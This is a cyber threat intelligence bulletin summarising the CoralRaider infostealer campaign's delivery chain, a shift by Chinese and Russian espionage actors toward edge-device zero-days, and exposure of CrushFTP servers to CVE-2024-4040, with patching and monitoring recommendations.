Ransomware/Malware Activity
Infostealer Malware Campaign Attributed to CoralRaider Exploits CDN Cache
Cybersecurity researchers have attributed an ongoing infostealer malware campaign to a threat actor termed "CoralRaider". CoralRaider is a financially motivated threat actor group of suspected Vietnamese origin known for targeting victims in Asian and Southeast Asian countries. The recent malware campaign has also been seen targeting countries such as the United States (U.S.), Germany, Poland, Japan, and Ecuador, among others.
- The campaign is designed to deliver infostealer malware including LummaC2, Rhadamanthys, and Cryptbot. The attack begins with a Windows shortcut file, which could be delivered via phishing or malvertising. The shortcut file contains PowerShell commands that grab an obfuscated HTML Application (HTA) file from the CDN cache of an attacker-controlled subdomain to avoid request delays and deceive network defenders. The HTA file contains JavaScript which includes a PowerShell decrypter and loader. The PowerShell loader drops scripts on the victim's machine to evade detection by configuring a Windows Defender exclusions list and bypassing User Access Controls. The PowerShell loader drops the final infostealer payload into the location previously specified to be excluded from Windows Defender scanning. The infostealer malware used in this campaign are recent versions available via malware-as-a-service platforms on underground forums.
- Attackers behind these infostealers can profit from stolen information such as user credentials, RDP logins, and browser session cookies by selling to other malicious actors to gain initial access.
CTIX analysts will continue to report on novel and evolving malware and associated campaigns.
- Bleeping Computer: CoralRaider Article
- The Hacker News: CoralRaider Article
- Cisco Talos Blog: CoralRaider Threat Spotlight
Threat Actor Activity
Chinese & Russian Hackers Moving Toward Edge Zero-Day Exploits for Increased Detection Evasion
An increase in espionage attacks has led researchers to observe a notable shift in Chinese and Russian hackers' tactical shift towards targeting edge devices like VPN (Virtual Private Network) appliances, firewalls, routers, and Internet of Things (IoT) tools. Previously, it has been common to see hackers targeting employees with malicious phishing emails to gain access to companies; however, last year saw one of the lowest recent volumes of espionage attacks on Windows computers. Instead, a trend towards zero-day vulnerabilities and malware has developed for edge devices.
- Researchers believe that the current nature of Endpoint Detection and Response (EDR) solutions has reached a level of effectiveness where threat actors would have better odds of avoiding detection by deploying malware on a VPN appliance, for example, as opposed to a Windows computer. This belief is backed by the fact that there was a 50% growth in zero-days used by both espionage groups and financially motivated attackers last year, compared to 2022.
- Exploiting zero-day vulnerabilities in commonly deployed devices likely allows hackers to remain undetected within systems for longer periods as opposed to more traditional targets like Windows computers with robust EDR solutions, reflecting the trend of stealth and longevity within compromised systems, an emphasis of espionage hacking.
- Although the exploitation of edge vulnerabilities has become a favored approach for both espionage and criminal activities as a means of staying within a system for longer without being flagged by security solutions, the average "dwell time" in breached systems has also decreased to a record low of roughly ten days, indicating improved detection capabilities and enhanced defense mechanisms against sophisticated threats.
CTIX analysts recommend organizations implement monitoring and detection capabilities to better defend against cyberattacks.
Vulnerabilities
Thousands of CrushFTP Servers May be Vulnerable to the Exploitation of a Patched Vulnerability
UPDATE: Over 1,400 CrushFTP servers exposed to the public internet are at risk due to a critical vulnerability. The flaw, tracked as CVE-2024-4040, is a server-side template injection (SSTI) vulnerability. This vulnerability was previously exploited as a zero-day and allows for a virtual file system (VFS) sandbox escape that can lead to arbitrary file reading and full remote code execution (RCE) on unpatched systems. Security researchers have described the flaw as fully unauthenticated and trivially exploitable, emphasizing its potential to bypass authentication for administrative access, executing code as root.
The issue has drawn significant attention, with cybersecurity firms observing its exploitation in targeted attacks aimed at U.S. organizations, suggesting a politically motivated intelligence-gathering effort. Shodan scans reveal that over 5,000 CrushFTP servers are currently internet-exposed, though it's unclear how many are vulnerable.
Following the vulnerability disclosure and patch release by CrushFTP, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-4040 to its Known Exploited Vulnerabilities (KEV) catalog, directing U.S. federal agencies to secure their servers by no later than May 1, 2024. CrushFTP has responded by urging users to update their systems immediately and check frequently for the latest security updates. This situation underscores the importance of timely patching to protect sensitive data and infrastructure from potential cyber threats.
CTIX analysts recommend that CrushFTP administrators ensure that they have updated their infrastructure and conduct an internal investigation for evidence of exploitation if it has not been patched.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.